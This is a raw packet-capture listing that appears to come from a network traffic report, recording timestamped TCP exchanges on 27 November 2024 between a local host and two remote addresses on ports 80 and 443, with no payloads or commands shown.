                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.092505932 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.093106985 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.093188047 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.093245029 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.093904972 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.094049931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.094295979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.094851971 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.094914913 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.094961882 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.095638037 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.095762968 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.095849991 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.096528053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.096661091 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.096715927 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.097357988 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.097472906 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.097522020 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.098261118 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.098349094 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.098401070 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.099124908 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.099232912 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.099395990 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.099987030 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.100092888 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.100142002 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.100860119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.100955963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.101023912 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.101706028 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.101855993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.101948023 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.102575064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.102684975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.103454113 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.103516102 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.103553057 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.104712963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.104819059 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.105329037 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.105379105 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.105379105 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.105451107 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.106857061 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.106925011 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.106965065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.106965065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.107233047 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.107341051 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.107434034 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.108129025 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.108205080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.108278990 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.108949900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.109019995 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.109093904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.109678984 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.109746933 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.109806061 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.110471010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.110516071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.110565901 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.111454010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.111511946 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.111640930 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.112214088 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.112298012 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.112379074 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.113132954 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.113234043 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.113410950 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.113919973 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.114010096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.114135981 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.114763975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.114820004 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.114873886 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.115624905 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.115746975 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.115935087 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.116509914 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.116585970 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.116632938 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.117377043 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.117475986 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.117556095 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.118231058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.118349075 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.118426085 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.119105101 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.119221926 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.119986057 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120063066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120197058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120826006 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120877028 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120913029 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.120937109 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.121738911 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.121809006 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.121857882 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.122555971 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.122684002 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.122839928 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.123444080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.123541117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.123593092 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.124344110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.124542952 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.124605894 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.125160933 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.125272036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.125569105 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.126108885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.126178980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.126383066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.126949072 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.127042055 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.127093077 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.127767086 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.127872944 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.127963066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.128642082 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.128829956 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.128895044 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.129489899 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.169802904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.268810987 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.268827915 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.268894911 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.268915892 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.268946886 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.269248962 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.269248962 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.269273996 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.269284964 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.272008896 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.272051096 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.272121906 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.272311926 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.272321939 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293306112 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293338060 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293390036 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293618917 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293742895 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.293787003 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.294526100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.294682026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.294763088 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.295392990 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.295480967 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.295646906 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.296274900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.296349049 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.297086954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.297188044 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.297246933 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.297333002 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.298005104 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.298105001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.298191071 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.298888922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.299042940 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.299137115 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.299732924 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.299756050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.299813032 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.300621986 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.300748110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.300894976 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.301464081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.301630020 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.301769972 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.302320004 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.302423954 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.302489996 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.303191900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.303282022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.303431034 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.304126024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.304313898 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.304435015 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305061102 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305155993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305195093 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305820942 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305867910 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.305927992 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.306639910 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.306729078 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.306844950 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.307554960 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.307585955 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.307712078 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.308474064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.308571100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.308671951 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.309271097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.309340954 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.309382915 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.310178995 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.310254097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.310301065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.311144114 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.311280012 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.311624050 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312010050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312146902 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312211037 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312720060 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312829018 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.312884092 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.313594103 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.313680887 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.313735962 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.314461946 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.314642906 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.314703941 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.315506935 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.315537930 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.315613985 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.316394091 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.316437960 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.316565037 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.317249060 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.317348003 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.317421913 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.318068981 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.318165064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.318291903 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.318892002 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.318989038 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.319040060 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.319698095 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.319751024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.319814920 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.320561886 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.320770025 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.320980072 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.321398020 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.321634054 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.321674109 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.322288990 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.322390079 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.322437048 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.323154926 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.323214054 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.323268890 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.324240923 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.324439049 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.325287104 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.325344086 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.325370073 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.325431108 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326172113 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326220036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326328039 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326821089 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326884031 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.326951981 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.327581882 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.327641964 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.328356028 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:00.328408957 CET4979280192.168.2.10185.215.113.16
